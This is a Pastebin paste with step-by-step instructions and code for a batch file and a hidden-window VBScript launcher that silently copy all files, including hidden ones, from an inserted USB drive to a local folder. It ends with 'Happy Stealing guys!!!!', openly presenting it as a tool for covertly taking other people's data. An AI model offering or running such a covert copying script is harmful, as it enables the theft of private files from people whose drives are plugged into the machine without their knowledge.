Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Below are the steps:If I Drive USB
- 1. Create a file named "idrive.bat" and paste the below content in the file.
- @ECHO OFF
- XCOPY I: D:\Copy_of_I /E /H /I /Q /Y
- ATTRIB +I D:\Copy_of_I
- EXIT
- Note: Please make sure that you modify the drive letters according to your system.
- 2. Create another file named "idrive.vbs" and paste the below content in the file.
- Set WshShell=WScript.CreateObject("WScript.Shell")
- obj=WshShell.Run("idrive.bat",0)
- Set WshShell=Nothing
- 3. Save both the files and keep them in the same directory.
- 4. Create a shortcut for "idrive.vbs" file and assign a shortcut key to the file. For eg. CTRL+ALT+N
- 5. Insert the pen drive or USB drive to your system.
- 6. Go to desktop and press CTRL+ALT+N. The data will be copied from USB drive to the specified location in the background.
- Happy Stealing guys!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement